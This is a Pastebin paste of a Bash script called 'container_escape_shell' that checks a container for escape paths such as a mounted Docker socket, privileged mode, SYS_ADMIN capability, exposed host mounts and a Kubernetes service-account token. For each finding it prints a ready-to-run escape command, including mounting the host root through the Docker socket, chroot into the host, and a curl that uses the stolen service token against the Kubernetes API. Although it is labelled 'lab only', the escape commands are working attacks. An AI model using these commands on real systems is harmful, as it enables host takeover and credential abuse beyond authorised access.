API tools faq
paste
orenma

container_escape_shell

orenma
Jul 19th, 2025
453
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.79 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2.  
  3. echo "==== Container Escape Safety Check (Lab Only) ===="
  4. apk add jq
  5.  
  6. function suggest_exploit() {
  7.   local reason=$1
  8.   local command=$2
  9.  
  10.   echo -e "\n[⚠️  Escape Path Detected: $reason]"
  11.   echo -e "[💡 Suggested Command for Lab Use Only]"
  12.   echo -e "    $command"
  13. }
  14.  
  15. function check_path() {
  16.   local path=$1
  17.   local explanation=$2
  18.   if [ -e "$path" ]; then
  19.     echo "[!] Found: $path - $explanation"
  20.     return 0
  21.   else
  22.     echo "[+] Not found: $path - Safe"
  23.     return 1
  24.   fi
  25. }
  26.  
  27. function check_docker_socket() {
  28.   echo "[*] Checking Docker socket..."
  29.   if [ -S /var/run/docker.sock ]; then
  30.     echo "[!] Docker socket is mounted inside the container"
  31.     suggest_exploit "Docker socket exposure" \
  32.       "docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt sh"
  33.   else
  34.     echo "[+] Docker socket not found - Safe"
  35.   fi
  36. }
  37.  
  38. function check_host_proc_access() {
  39.   if check_path "/proc/1/root" "Can allow access to host filesystem if not namespaced"; then
  40.     suggest_exploit "/proc/1/root exposed" \
  41.       "chroot /proc/1/root /bin/sh"
  42.   fi
  43. }
  44.  
  45. function check_cap_sys_admin() {
  46.   echo "[*] Checking capabilities..."
  47.   if capsh --print | grep -qE "cap_sys_admin|cap_sys_ptrace"; then
  48.     echo "[!] Container has SYS_ADMIN or PTRACE - Dangerous capabilities available"
  49.     suggest_exploit "SYS_ADMIN + mounted host path" \
  50.       "mount -t proc proc /host/proc && chroot /host sh"
  51.   else
  52.     echo "[+] SYS_ADMIN and PTRACE not found - Safe"
  53.   fi
  54. }
  55.  
  56. function check_privileged_mode() {
  57.   echo "[*] Checking for privileged mode..."
  58.   if grep -q 'CapEff: ffffffff' /proc/self/status; then
  59.     echo "[!] Container likely running in privileged mode"
  60.     suggest_exploit "Privileged container" \
  61.       "mkdir /tmp/host; mount /dev/sda1 /tmp/host && chroot /tmp/host"
  62.   else
  63.     echo "[+] Container is not in full privileged mode"
  64.   fi
  65. }
  66.  
  67. function check_host_mount() {
  68.   if mount | grep -q '/host'; then
  69.     echo "[!] Host filesystem appears mounted under /host"
  70.     suggest_exploit "Host mount detected" \
  71.       "chroot /host /bin/bash"
  72.   fi
  73. }
  74.  
  75. function check_k8s_token() {
  76.   if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]; then
  77.     echo "[!] Kubernetes service token found"
  78.     suggest_exploit "K8s API abuse via service token" \
  79.       "curl -s --header \"Authorization: Bearer \$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)\" https://kubernetes.default"
  80.   else
  81.     echo "[+] No K8s service account token found"
  82.   fi
  83. }
  84.  
  85. echo ""
  86. check_path "/dev/mem" "Can lead to host memory read/write if privileged"
  87. check_host_proc_access
  88. check_host_mount
  89. check_cap_sys_admin
  90. check_privileged_mode
  91. check_docker_socket
  92. check_k8s_token
  93.  
  94. echo ""
  95. echo "==== Check Complete. Use responsibly in lab environments only. ===="
  96.  
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!